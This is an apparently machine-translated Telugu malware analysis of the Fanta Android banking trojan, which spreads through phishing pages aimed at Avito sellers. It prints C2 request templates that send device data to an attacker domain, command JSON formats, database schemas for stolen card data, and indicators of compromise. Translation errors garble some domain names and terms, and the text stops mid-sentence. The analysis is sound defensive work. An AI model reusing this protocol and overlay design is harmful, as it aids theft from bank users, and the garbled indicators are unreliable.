ఒక రోజు మీరు Avitoలో ఏదైనా విక్రయించాలనుకుంటున్నారు మరియు మీ ఉత్పత్తి యొక్క వివరణాత్మక వివరణను పోస్ట్ చేసిన తర్వాత (ఉదాహరణకు, RAM మాడ్యూల్), మీరు ఈ సందేశాన్ని అందుకుంటారు:
మీరు "కొనసాగించు" బటన్ను క్లిక్ చేసిన తర్వాత, చిహ్నం మరియు నమ్మకాన్ని కలిగించే పేరుతో ఉన్న APK ఫైల్ మీ Android పరికరానికి డౌన్లోడ్ చేయబడుతుంది. మీరు కొన్ని కారణాల వలన యాక్సెసిబిలిటీ సర్వీస్ హక్కులను అభ్యర్థించిన అప్లికేషన్ను ఇన్స్టాల్ చేసారు, ఆపై రెండు విండోలు కనిపించాయి మరియు త్వరగా అదృశ్యమయ్యాయి మరియు... అంతే.
మీరు మీ బ్యాలెన్స్ని చెక్ చేయడానికి వెళతారు, కానీ కొన్ని కారణాల వల్ల మీ బ్యాంకింగ్ యాప్ మళ్లీ మీ కార్డ్ వివరాలను అడుగుతుంది. డేటాను నమోదు చేసిన తర్వాత, ఏదో భయంకరమైనది జరుగుతుంది: కొన్ని కారణాల వల్ల మీకు ఇంకా అస్పష్టంగా ఉంది, మీ ఖాతా నుండి డబ్బు అదృశ్యం కావడం ప్రారంభమవుతుంది. మీరు సమస్యను పరిష్కరించడానికి ప్రయత్నిస్తున్నారు, కానీ మీ ఫోన్ నిరోధిస్తుంది: ఇది "బ్యాక్" మరియు "హోమ్" కీలను నొక్కినప్పుడు, ఆఫ్ చేయదు మరియు ఎటువంటి భద్రతా చర్యలను సక్రియం చేయడానికి మిమ్మల్ని అనుమతించదు. ఫలితంగా, మీరు డబ్బు లేకుండా మిగిలిపోయారు, మీ వస్తువులు కొనుగోలు చేయబడలేదు, మీరు గందరగోళానికి గురవుతారు మరియు ఆశ్చర్యపోతున్నారు: ఏమి జరిగింది?
సమాధానం చాలా సులభం: మీరు ఫ్లెక్స్నెట్ కుటుంబ సభ్యుడైన ఆండ్రాయిడ్ ట్రోజన్ ఫాంటాకి బాధితురాలిగా మారారు. ఇది ఎలా జరిగింది? ఇప్పుడు వివరిస్తాము.
రచయితలు: ఆండ్రీ పోలోవింకిన్మాల్వేర్ విశ్లేషణలో జూనియర్ స్పెషలిస్ట్, ఇవాన్ పిసరేవ్మాల్వేర్ విశ్లేషణలో నిపుణుడు.
కొన్ని గణాంకాలు
ఆండ్రాయిడ్ ట్రోజన్ల ఫ్లెక్స్నెట్ కుటుంబం మొదట 2015లో తిరిగి తెలిసింది. చాలా సుదీర్ఘమైన కార్యకలాపాలలో, కుటుంబం అనేక ఉపజాతులకు విస్తరించింది: ఫాంటా, లైమ్బాట్, లిప్టన్, మొదలైనవి. ట్రోజన్, అలాగే దానితో అనుబంధించబడిన మౌలిక సదుపాయాలు ఇప్పటికీ నిలబడవు: కొత్త ప్రభావవంతమైన పంపిణీ పథకాలు అభివృద్ధి చేయబడుతున్నాయి - మా విషయంలో, అధిక-నాణ్యత ఫిషింగ్ పేజీలు నిర్దిష్ట వినియోగదారు-విక్రేతని లక్ష్యంగా చేసుకుంటాయి మరియు ట్రోజన్ డెవలపర్లు ఫ్యాషన్ పోకడలను అనుసరిస్తారు. వైరస్ రైటింగ్ - సోకిన పరికరాలు మరియు బైపాస్ ప్రొటెక్షన్ మెకానిజమ్ల నుండి మరింత సమర్ధవంతంగా డబ్బును దొంగిలించడం సాధ్యం చేసే కొత్త కార్యాచరణను జోడించడం.
ఈ కథనంలో వివరించిన ప్రచారం రష్యా నుండి వినియోగదారులను లక్ష్యంగా చేసుకుంది; ఉక్రెయిన్లో తక్కువ సంఖ్యలో సోకిన పరికరాలు నమోదు చేయబడ్డాయి మరియు కజాఖ్స్తాన్ మరియు బెలారస్లో కూడా తక్కువ.
Flexnet ఇప్పుడు 4 సంవత్సరాలకు పైగా Android ట్రోజన్ రంగంలో ఉన్నప్పటికీ మరియు అనేక మంది పరిశోధకులచే వివరంగా అధ్యయనం చేయబడినప్పటికీ, ఇది ఇప్పటికీ మంచి ఆకృతిలో ఉంది. జనవరి 2019 నుండి, నష్టం యొక్క సంభావ్య మొత్తం 35 మిలియన్ రూబిళ్లు కంటే ఎక్కువ - మరియు ఇది రష్యాలో ప్రచారాలకు మాత్రమే. 2015లో, ఈ ఆండ్రాయిడ్ ట్రోజన్ యొక్క వివిధ వెర్షన్లు భూగర్భ ఫోరమ్లలో విక్రయించబడ్డాయి, ఇక్కడ వివరణాత్మక వివరణతో ట్రోజన్ యొక్క సోర్స్ కోడ్ కూడా కనుగొనబడుతుంది. అంటే ప్రపంచంలోని నష్టం గణాంకాలు మరింత ఆకట్టుకున్నాయి. అటువంటి వృద్ధుడికి చెడ్డ సూచిక కాదు, కాదా?
అమ్మకం నుండి మోసం వరకు
ప్రకటనలు Avito కోసం ఇంటర్నెట్ సేవ కోసం ఫిషింగ్ పేజీ యొక్క గతంలో అందించిన స్క్రీన్షాట్ నుండి చూడవచ్చు, ఇది ఒక నిర్దిష్ట బాధితుడి కోసం తయారు చేయబడింది. స్పష్టంగా, దాడి చేసేవారు Avito యొక్క పార్సర్లలో ఒకదాన్ని ఉపయోగిస్తున్నారు, ఇది విక్రేత యొక్క ఫోన్ నంబర్ మరియు పేరు, అలాగే ఉత్పత్తి వివరణను సంగ్రహిస్తుంది. పేజీని విస్తరించిన తర్వాత మరియు APK ఫైల్ను సిద్ధం చేసిన తర్వాత, బాధితుడికి అతని పేరు మరియు అతని ఉత్పత్తి యొక్క వివరణ మరియు ఉత్పత్తి యొక్క "విక్రయం" నుండి పొందిన మొత్తంతో కూడిన ఫిషింగ్ పేజీకి లింక్తో SMS పంపబడుతుంది. బటన్పై క్లిక్ చేయడం ద్వారా, వినియోగదారు హానికరమైన APK ఫైల్ను అందుకుంటారు - ఫాంటా.
shcet491[.]ru డొమైన్ యొక్క అధ్యయనం అది Hostinger యొక్క DNS సర్వర్లకు అప్పగించబడిందని చూపింది:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
డొమైన్ జోన్ ఫైల్లో IP చిరునామాలు 31.220.23[.]236, 31.220.23[.]243 మరియు 31.220.23[.]235కి సూచించే ఎంట్రీలు ఉన్నాయి. అయినప్పటికీ, డొమైన్ యొక్క ప్రాథమిక వనరు రికార్డు (A రికార్డ్) IP చిరునామా 178.132.1[.]240తో సర్వర్ను సూచిస్తుంది.
IP చిరునామా 178.132.1[.]240 నెదర్లాండ్స్లో ఉంది మరియు ఇది హోస్ట్కు చెందినది వరల్డ్ స్ట్రీమ్. IP చిరునామాలు 31.220.23[.]235, 31.220.23[.]236 మరియు 31.220.23[.]243 UKలో ఉన్నాయి మరియు భాగస్వామ్య హోస్టింగ్ సర్వర్ HOSTINGERకి చెందినవి. రికార్డర్గా ఉపయోగించబడుతుంది openprov-ru. కింది డొమైన్లు IP చిరునామా 178.132.1[.]240కి కూడా పరిష్కరించబడ్డాయి:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- విప్లత291[.]రు
- perevod273[.]ru
- perevod901[.]ru
కింది ఫార్మాట్లోని లింక్లు దాదాపు అన్ని డొమైన్ల నుండి అందుబాటులో ఉన్నాయని గమనించాలి:
http://(www.){0,1}<%domain%>/[0-9]{7}
ఈ టెంప్లేట్ SMS సందేశం నుండి లింక్ను కూడా కలిగి ఉంటుంది. చారిత్రక డేటా ఆధారంగా, ఒక డొమైన్ పైన వివరించిన నమూనాలోని అనేక లింక్లకు అనుగుణంగా ఉన్నట్లు కనుగొనబడింది, ఇది అనేక మంది బాధితులకు ట్రోజన్ను పంపిణీ చేయడానికి ఒక డొమైన్ ఉపయోగించబడిందని సూచిస్తుంది.
కొంచెం ముందుకు వెళ్దాం: SMS నుండి లింక్ ద్వారా డౌన్లోడ్ చేయబడిన ట్రోజన్ చిరునామాను నియంత్రణ సర్వర్గా ఉపయోగిస్తుంది onusedseddohap[.]club. ఈ డొమైన్ 2019-03-12న రిజిస్టర్ చేయబడింది మరియు 2019-04-29 నుండి APK అప్లికేషన్లు ఈ డొమైన్తో ఇంటరాక్ట్ అవుతాయి. VirusTotal నుండి పొందిన డేటా ఆధారంగా, మొత్తం 109 అప్లికేషన్లు ఈ సర్వర్తో పరస్పర చర్య చేశాయి. డొమైన్ స్వయంగా IP చిరునామాకు పరిష్కరించబడింది 217.23.14[.]27, నెదర్లాండ్స్లో ఉంది మరియు హోస్టర్ యాజమాన్యంలో ఉంది వరల్డ్ స్ట్రీమ్. రికార్డర్గా ఉపయోగించబడుతుంది NameCheap. డొమైన్లు కూడా ఈ IP చిరునామాకు పరిష్కరించబడ్డాయి చెడ్డ-రాకూన్[.]క్లబ్ (2018-09-25 నుండి ప్రారంభమవుతుంది) మరియు బాడ్-రాకూన్[.]లైవ్ (2018-10-25 నుండి ప్రారంభమవుతుంది). డొమైన్తో చెడ్డ-రాకూన్[.]క్లబ్ 80 కంటే ఎక్కువ APK ఫైల్లు ఇంటరాక్ట్ చేయబడ్డాయి బాడ్-రాకూన్[.]లైవ్ - 100 కంటే ఎక్కువ.
సాధారణంగా, దాడి క్రింది విధంగా కొనసాగుతుంది:
ఫాంటా మూత కింద ఏముంది?
అనేక ఇతర ఆండ్రాయిడ్ ట్రోజన్ల మాదిరిగానే, ఫాంటా SMS సందేశాలను చదవడం మరియు పంపడం, USSD అభ్యర్థనలు చేయడం మరియు అప్లికేషన్ల పైన (బ్యాంకింగ్ వాటితో సహా) దాని స్వంత విండోలను ప్రదర్శించగలదు. అయినప్పటికీ, ఈ కుటుంబం యొక్క కార్యాచరణ యొక్క ఆర్సెనల్ వచ్చింది: ఫాంటా ఉపయోగించడం ప్రారంభించింది యాక్సెసిబిలిటీ సర్వీస్ వివిధ ప్రయోజనాల కోసం: ఇతర అప్లికేషన్ల నుండి నోటిఫికేషన్ల కంటెంట్లను చదవడం, సోకిన పరికరంలో ట్రోజన్ను గుర్తించడాన్ని నిరోధించడం మరియు అమలు చేయడాన్ని ఆపడం మొదలైనవి. ఫాంటా ఆండ్రాయిడ్ యొక్క అన్ని వెర్షన్లలో 4.4 కంటే తక్కువ వయస్సు లేకుండా పనిచేస్తుంది. ఈ వ్యాసంలో మేము ఈ క్రింది ఫాంటా నమూనాను నిశితంగా పరిశీలిస్తాము:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
ప్రారంభించిన వెంటనే
ప్రారంభించిన వెంటనే, ట్రోజన్ దాని చిహ్నాన్ని దాచిపెడుతుంది. సోకిన పరికరం పేరు జాబితాలో లేకుంటే మాత్రమే అప్లికేషన్ పని చేస్తుంది:
- android_x86
- VirtualBox
- Nexus 5X(బుల్హెడ్)
- Nexus 5(రేజర్)
ఈ చెక్ ట్రోజన్ యొక్క ప్రధాన సేవలో నిర్వహించబడుతుంది - ప్రధాన సేవ. మొదటిసారి ప్రారంభించినప్పుడు, అప్లికేషన్ యొక్క కాన్ఫిగరేషన్ పారామితులు డిఫాల్ట్ విలువలకు ప్రారంభించబడతాయి (కాన్ఫిగరేషన్ డేటాను నిల్వ చేసే ఫార్మాట్ మరియు వాటి అర్థం తరువాత చర్చించబడతాయి), మరియు కొత్త సోకిన పరికరం నియంత్రణ సర్వర్లో నమోదు చేయబడుతుంది. సందేశ రకంతో HTTP POST అభ్యర్థన సర్వర్కు పంపబడుతుంది రిజిస్టర్_బోట్ మరియు సోకిన పరికరం గురించి సమాచారం (Android వెర్షన్, IMEI, ఫోన్ నంబర్, ఆపరేటర్ పేరు మరియు ఆపరేటర్ నమోదు చేయబడిన దేశం కోడ్). చిరునామా నియంత్రణ సర్వర్గా పనిచేస్తుంది hXXp://onuseseddohap[.]club/controller.php. ప్రతిస్పందనగా, సర్వర్ ఫీల్డ్లను కలిగి ఉన్న సందేశాన్ని పంపుతుంది bot_id, bot_pwd, సర్వర్ - అప్లికేషన్ ఈ విలువలను CnC సర్వర్ యొక్క పారామితులుగా సేవ్ చేస్తుంది. పరామితి సర్వర్ ఫీల్డ్ అందకపోతే ఐచ్ఛికం: ఫాంటా రిజిస్ట్రేషన్ చిరునామాను ఉపయోగిస్తుంది - hXXp://onuseseddohap[.]club/controller.php. CnC చిరునామాను మార్చే పనిని రెండు సమస్యలను పరిష్కరించడానికి ఉపయోగించవచ్చు: అనేక సర్వర్ల మధ్య లోడ్ను సమానంగా పంపిణీ చేయడానికి (అధిక సంఖ్యలో సోకిన పరికరాలతో, ఆప్టిమైజ్ చేయని వెబ్ సర్వర్లో లోడ్ ఎక్కువగా ఉంటుంది) మరియు ప్రత్యామ్నాయాన్ని కూడా ఉపయోగించవచ్చు. CnC సర్వర్లలో ఒకటి విఫలమైన సందర్భంలో సర్వర్.
అభ్యర్థనను పంపుతున్నప్పుడు లోపం సంభవించినట్లయితే, ట్రోజన్ 20 సెకన్ల తర్వాత నమోదు ప్రక్రియను పునరావృతం చేస్తుంది.
పరికరం విజయవంతంగా నమోదు చేయబడిన తర్వాత, ఫాంటా వినియోగదారుకు క్రింది సందేశాన్ని ప్రదర్శిస్తుంది:
ముఖ్యమైన గమనిక: సేవ అని పిలుస్తారు సిస్టమ్ సెక్యూరిటీ - ట్రోజన్ సేవ పేరు, మరియు బటన్ను క్లిక్ చేసిన తర్వాత సరే సోకిన పరికరం యొక్క యాక్సెసిబిలిటీ సెట్టింగ్లతో విండో తెరవబడుతుంది, ఇక్కడ వినియోగదారు తప్పనిసరిగా హానికరమైన సేవ కోసం ప్రాప్యత హక్కులను మంజూరు చేయాలి:
యూజర్ ఆన్ చేసిన వెంటనే యాక్సెసిబిలిటీ సర్వీస్, ఫాంటా అప్లికేషన్ విండోస్ యొక్క కంటెంట్లకు మరియు వాటిలో చేసే చర్యలకు యాక్సెస్ పొందుతుంది:
యాక్సెసిబిలిటీ హక్కులను పొందిన వెంటనే, ట్రోజన్ నోటిఫికేషన్లను చదవడానికి నిర్వాహక హక్కులు మరియు హక్కులను అభ్యర్థిస్తుంది:
యాక్సెసిబిలిటీ సర్వీస్ని ఉపయోగించి, అప్లికేషన్ కీస్ట్రోక్లను అనుకరిస్తుంది, తద్వారా అవసరమైన అన్ని హక్కులను ఇస్తుంది.
Fanta కాన్ఫిగరేషన్ డేటాను నిల్వ చేయడానికి అవసరమైన బహుళ డేటాబేస్ ఉదంతాలను (తరువాత వివరించబడుతుంది) సృష్టిస్తుంది, అలాగే సోకిన పరికరం గురించి ప్రక్రియలో సేకరించిన సమాచారం. సేకరించిన సమాచారాన్ని పంపడానికి, ట్రోజన్ డేటాబేస్ నుండి ఫీల్డ్లను డౌన్లోడ్ చేయడానికి మరియు నియంత్రణ సర్వర్ నుండి ఆదేశాన్ని స్వీకరించడానికి రూపొందించిన పునరావృత విధిని సృష్టిస్తుంది. CnCని యాక్సెస్ చేయడానికి విరామం Android సంస్కరణపై ఆధారపడి సెట్ చేయబడింది: 5.1 విషయంలో, విరామం 10 సెకన్లు, లేకపోతే 60 సెకన్లు.
ఆదేశాన్ని స్వీకరించడానికి, ఫాంటా ఒక అభ్యర్థన చేస్తుంది GetTask నిర్వహణ సర్వర్కు. ప్రతిస్పందనగా, CnC కింది ఆదేశాలలో ఒకదాన్ని పంపగలదు:
జట్టు | వివరణ |
---|---|
0 | SMS సందేశాన్ని పంపండి |
1 | ఫోన్ కాల్ లేదా USSD కమాండ్ చేయండి |
2 | పారామీటర్ను అప్డేట్ చేస్తుంది విరామం |
3 | పారామీటర్ను అప్డేట్ చేస్తుంది అడ్డుకొనే |
6 | పారామీటర్ను అప్డేట్ చేస్తుంది smsManager |
9 | SMS సందేశాలను సేకరించడం ప్రారంభించండి |
11 | మీ ఫోన్ని ఫ్యాక్టరీ సెట్టింగ్లకు రీసెట్ చేయండి |
12 | డైలాగ్ బాక్స్ సృష్టి యొక్క లాగింగ్ను ప్రారంభించండి/నిలిపివేయండి |
ఫాంటా 70 బ్యాంకింగ్ యాప్లు, ఫాస్ట్ పేమెంట్ సిస్టమ్లు మరియు ఇ-వాలెట్ల నుండి నోటిఫికేషన్లను కూడా సేకరిస్తుంది మరియు వాటిని డేటాబేస్లో నిల్వ చేస్తుంది.
కాన్ఫిగరేషన్ పారామితులను నిల్వ చేస్తోంది
కాన్ఫిగరేషన్ పారామితులను నిల్వ చేయడానికి, Fanta Android ప్లాట్ఫారమ్ కోసం ప్రామాణిక విధానాన్ని ఉపయోగిస్తుంది - ప్రాధాన్యతలు-ఫైళ్లు. అనే ఫైల్లో సెట్టింగ్లు సేవ్ చేయబడతాయి సెట్టింగులు. సేవ్ చేయబడిన పారామితుల వివరణ క్రింది పట్టికలో ఉంది.
పేరు | డిఫాల్ట్ విలువ | సాధ్యమయ్యే విలువలు | వివరణ |
---|---|---|---|
id | 0 | పూర్ణ సంఖ్య | బోట్ ID |
సర్వర్ | hXXp://onuseseddohap[.]club/ | URL | సర్వర్ చిరునామాను నియంత్రించండి |
pwd | - | స్ట్రింగ్ | సర్వర్ పాస్వర్డ్ |
విరామం | 20 | పూర్ణ సంఖ్య | సమయ విరామం. కింది పనులను ఎంతకాలం వాయిదా వేయాలో సూచిస్తుంది:
|
అడ్డుకొనే | అన్ని | అన్నీ/టెల్ నంబర్ | ఫీల్డ్ స్ట్రింగ్తో సమానంగా ఉంటే అన్ని లేదా టెలి నంబర్, అప్పుడు అందుకున్న SMS సందేశం అప్లికేషన్ ద్వారా అడ్డగించబడుతుంది మరియు వినియోగదారుకు చూపబడదు |
smsManager | 0 | 0/1 | డిఫాల్ట్ SMS గ్రహీతగా అప్లికేషన్ను ప్రారంభించండి/నిలిపివేయండి |
డైలాగ్ చదవండి | తప్పుడు | ఒప్పు తప్పు | ఈవెంట్ లాగింగ్ని ఎనేబుల్/డిజేబుల్ చేయండి యాక్సెసిబిలిటీ ఈవెంట్ |
ఫాంటా ఫైల్ను కూడా ఉపయోగిస్తుంది smsManager:
పేరు | డిఫాల్ట్ విలువ | సాధ్యమయ్యే విలువలు | వివరణ |
---|---|---|---|
pckg | - | స్ట్రింగ్ | SMS సందేశ నిర్వాహకుడి పేరు ఉపయోగించబడింది |
డేటాబేస్లతో పరస్పర చర్య
దాని ఆపరేషన్ సమయంలో, ట్రోజన్ రెండు డేటాబేస్లను ఉపయోగిస్తుంది. డేటాబేస్ పేరు పెట్టబడింది a ఫోన్ నుండి సేకరించిన వివిధ సమాచారాన్ని నిల్వ చేయడానికి ఉపయోగిస్తారు. రెండవ డేటాబేస్ పేరు పెట్టబడింది fanta.db మరియు బ్యాంక్ కార్డ్ల గురించి సమాచారాన్ని సేకరించడానికి రూపొందించబడిన ఫిషింగ్ విండోలను రూపొందించడానికి బాధ్యత వహించే సెట్టింగ్లను సేవ్ చేయడానికి ఉపయోగించబడుతుంది.
ట్రోజన్ డేటాబేస్ను ఉపయోగిస్తుంది а సేకరించిన సమాచారాన్ని నిల్వ చేయడానికి మరియు మీ చర్యలను లాగ్ చేయడానికి. డేటా పట్టికలో నిల్వ చేయబడుతుంది చిట్టాలు. పట్టికను సృష్టించడానికి, క్రింది SQL ప్రశ్నను ఉపయోగించండి:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)
డేటాబేస్ కింది సమాచారాన్ని కలిగి ఉంది:
1. సోకిన పరికరం యొక్క ప్రారంభాన్ని సందేశంతో లాగ్ చేయడం ఫోన్ ఆన్ అయింది!
2. అప్లికేషన్ల నుండి నోటిఫికేషన్లు. కింది టెంప్లేట్ ప్రకారం సందేశం రూపొందించబడింది:
(<%App Name%>)<%Title%>: <%Notification text%>
3. ట్రోజన్ సృష్టించిన ఫిషింగ్ ఫారమ్ల నుండి బ్యాంక్ కార్డ్ డేటా. పరామితి VIEW_NAME కింది వాటిలో ఒకటి కావచ్చు:
- AliExpress
- Avito
- Google ప్లే
- ఇతర <%యాప్ పేరు%>
సందేశం ఫార్మాట్లో లాగిన్ చేయబడింది:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. ఫార్మాట్లో ఇన్కమింగ్/అవుట్గోయింగ్ SMS సందేశాలు:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. ఫార్మాట్లో డైలాగ్ బాక్స్ను సృష్టించే ప్యాకేజీ గురించి సమాచారం:
(<%Package name%>)<%Package information%>
ఉదాహరణ పట్టిక చిట్టాలు:
ఫాంటా యొక్క కార్యాచరణలో ఒకటి బ్యాంక్ కార్డుల గురించి సమాచారాన్ని సేకరించడం. బ్యాంకింగ్ అప్లికేషన్లను తెరిచేటప్పుడు ఫిషింగ్ విండోలను సృష్టించడం ద్వారా డేటా సేకరణ జరుగుతుంది. ట్రోజన్ ఒక్కసారి మాత్రమే ఫిషింగ్ విండోను సృష్టిస్తుంది. వినియోగదారుకు విండో చూపబడిన సమాచారం పట్టికలో నిల్వ చేయబడుతుంది సెట్టింగులు డేటాబేస్లో fanta.db. డేటాబేస్ సృష్టించడానికి, క్రింది SQL ప్రశ్నను ఉపయోగించండి:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);
అన్ని టేబుల్ ఫీల్డ్లు సెట్టింగులు డిఫాల్ట్గా 1కి ప్రారంభించబడింది (ఫిషింగ్ విండోను సృష్టించండి). వినియోగదారు వారి డేటాను నమోదు చేసిన తర్వాత, విలువ 0కి సెట్ చేయబడుతుంది. పట్టిక ఫీల్డ్ల ఉదాహరణ సెట్టింగులు:
- లాగిన్_ చేయవచ్చు — బ్యాంకింగ్ అప్లికేషన్ను తెరిచేటప్పుడు ఫారమ్ను ప్రదర్శించడానికి ఫీల్డ్ బాధ్యత వహిస్తుంది
- మొదటి_బ్యాంక్ - ఉపయోగం లో లేదు
- చెయ్యవచ్చు_అవిటో — Avito అప్లికేషన్ను తెరిచేటప్పుడు ఫారమ్ను ప్రదర్శించడానికి ఫీల్డ్ బాధ్యత వహిస్తుంది
- చెయ్యవచ్చు_అలీ - Aliexpress అప్లికేషన్ను తెరిచేటప్పుడు ఫారమ్ను ప్రదర్శించడానికి ఫీల్డ్ బాధ్యత వహిస్తుంది
- చెయ్యవచ్చు_మరొకటి - జాబితా నుండి ఏదైనా అప్లికేషన్ను తెరిచేటప్పుడు ఫారమ్ను ప్రదర్శించడానికి ఫీల్డ్ బాధ్యత వహిస్తుంది: యులా, పాండావో, డ్రోమ్ ఆటో, వాలెట్. డిస్కౌంట్ మరియు బోనస్ కార్డ్లు, Aviasales, బుకింగ్, Trivago
- చెయ్యవచ్చు_కార్డు — ఫీల్డ్ తెరచినప్పుడు ఫారమ్ను ప్రదర్శించడానికి బాధ్యత వహిస్తుంది Google ప్లే
నిర్వహణ సర్వర్తో పరస్పర చర్య
నిర్వహణ సర్వర్తో నెట్వర్క్ పరస్పర చర్య HTTP ప్రోటోకాల్ ద్వారా జరుగుతుంది. నెట్వర్క్తో పని చేయడానికి, ఫాంటా జనాదరణ పొందిన రెట్రోఫిట్ లైబ్రరీని ఉపయోగిస్తుంది. అభ్యర్థనలు వీరికి పంపబడ్డాయి: hXXp://onuseseddohap[.]club/controller.php. సర్వర్లో నమోదు చేసేటప్పుడు సర్వర్ చిరునామాను మార్చవచ్చు. సర్వర్ నుండి ప్రతిస్పందనగా కుక్కీలు పంపబడవచ్చు. ఫాంటా సర్వర్కి క్రింది అభ్యర్థనలను చేస్తుంది:
- నియంత్రణ సర్వర్లో బాట్ యొక్క నమోదు మొదటిసారిగా ప్రారంభించిన తర్వాత ఒకసారి జరుగుతుంది. సోకిన పరికరం గురించిన కింది డేటా సర్వర్కు పంపబడుతుంది:
· కుకీ — సర్వర్ నుండి అందుకున్న కుక్కీలు (డిఫాల్ట్ విలువ ఖాళీ స్ట్రింగ్)
· మోడ్ - స్ట్రింగ్ స్థిరాంకం రిజిస్టర్_బోట్
· ఉపసర్గ - పూర్ణాంక స్థిరాంకం 2
· వెర్షన్_sdk - కింది టెంప్లేట్ ప్రకారం ఏర్పడుతుంది: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· IMEI - సోకిన పరికరం యొక్క IMEI
· దేశంలో — ISO ఆకృతిలో ఆపరేటర్ నమోదు చేయబడిన దేశం యొక్క కోడ్
· సంఖ్య - ఫోను నంబరు
· ఆపరేటర్లు - ఆపరేటర్ పేరుసర్వర్కు పంపిన అభ్యర్థనకు ఉదాహరణ:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
అభ్యర్థనకు ప్రతిస్పందనగా, సర్వర్ తప్పనిసరిగా కింది పారామితులను కలిగి ఉన్న JSON ఆబ్జెక్ట్ను తిరిగి అందించాలి:
· bot_id - సోకిన పరికరం యొక్క ID. bot_id 0కి సమానం అయితే, ఫాంటా అభ్యర్థనను మళ్లీ అమలు చేస్తుంది.
bot_pwd — సర్వర్ కోసం పాస్వర్డ్.
సర్వర్ - సర్వర్ చిరునామాను నియంత్రించండి. ఐచ్ఛిక పరామితి. పరామితి పేర్కొనబడకపోతే, అప్లికేషన్లో సేవ్ చేయబడిన చిరునామా ఉపయోగించబడుతుంది.ఉదాహరణ JSON వస్తువు:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- సర్వర్ నుండి ఆదేశాన్ని స్వీకరించడానికి అభ్యర్థన. కింది డేటా సర్వర్కు పంపబడుతుంది:
· కుకీ - సర్వర్ నుండి అందుకున్న కుక్కీలు
· బిడ్ - అభ్యర్థనను పంపుతున్నప్పుడు స్వీకరించబడిన సోకిన పరికరం యొక్క id రిజిస్టర్_బోట్
· pwd - సర్వర్ కోసం పాస్వర్డ్
· divice_admin - అడ్మినిస్ట్రేటర్ హక్కులు పొందబడ్డాయో లేదో ఫీల్డ్ నిర్ణయిస్తుంది. నిర్వాహక హక్కులు పొందినట్లయితే, ఫీల్డ్ సమానంగా ఉంటుంది 1, లేకపోతే 0
· సౌలభ్యాన్ని — యాక్సెసిబిలిటీ సర్వీస్ ఆపరేషన్ స్థితి. సేవ ప్రారంభించబడితే, దాని విలువ 1, లేకపోతే 0
· SMS మేనేజర్ — SMSను స్వీకరించడానికి ట్రోజన్ డిఫాల్ట్ అప్లికేషన్గా ప్రారంభించబడిందో లేదో చూపిస్తుంది
· స్క్రీన్ - స్క్రీన్ ఏ స్థితిలో ఉందో ప్రదర్శిస్తుంది. విలువ సెట్ చేయబడుతుంది 1, స్క్రీన్ ఆన్లో ఉంటే, లేకపోతే 0;సర్వర్కు పంపిన అభ్యర్థనకు ఉదాహరణ:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>
ఆదేశంపై ఆధారపడి, సర్వర్ వివిధ పారామితులతో JSON ఆబ్జెక్ట్ను తిరిగి ఇవ్వగలదు:
· జట్టు SMS సందేశాన్ని పంపండి: పారామితులు ఫోన్ నంబర్, SMS సందేశం యొక్క వచనం మరియు పంపబడుతున్న సందేశం యొక్క IDని కలిగి ఉంటాయి. రకంతో సర్వర్కు సందేశాన్ని పంపేటప్పుడు ఐడెంటిఫైయర్ ఉపయోగించబడుతుంది setSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }
· జట్టు ఫోన్ కాల్ లేదా USSD కమాండ్ చేయండి: ఫోన్ నంబర్ లేదా కమాండ్ రెస్పాన్స్ బాడీలో వస్తుంది.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }
· జట్టు విరామం పరామితిని మార్చండి.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }
· జట్టు ఇంటర్సెప్ట్ పరామితిని మార్చండి.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }
· జట్టు SmsManager ఫీల్డ్ని మార్చండి.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }
· జట్టు సోకిన పరికరం నుండి SMS సందేశాలను సేకరించండి.
{ "response": [ { "mode": 9 } ], "status":"ok" }
· జట్టు మీ ఫోన్ని ఫ్యాక్టరీ సెట్టింగ్లకు రీసెట్ చేయండి:
{ "response": [ { "mode": 11 } ], "status":"ok" }
· జట్టు ReadDialog పరామితిని మార్చండి.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- రకంతో సందేశాన్ని పంపుతోంది setSmsStatus. ఆదేశం అమలు చేయబడిన తర్వాత ఈ అభ్యర్థన చేయబడుతుంది SMS సందేశాన్ని పంపండి. అభ్యర్థన ఇలా కనిపిస్తుంది:
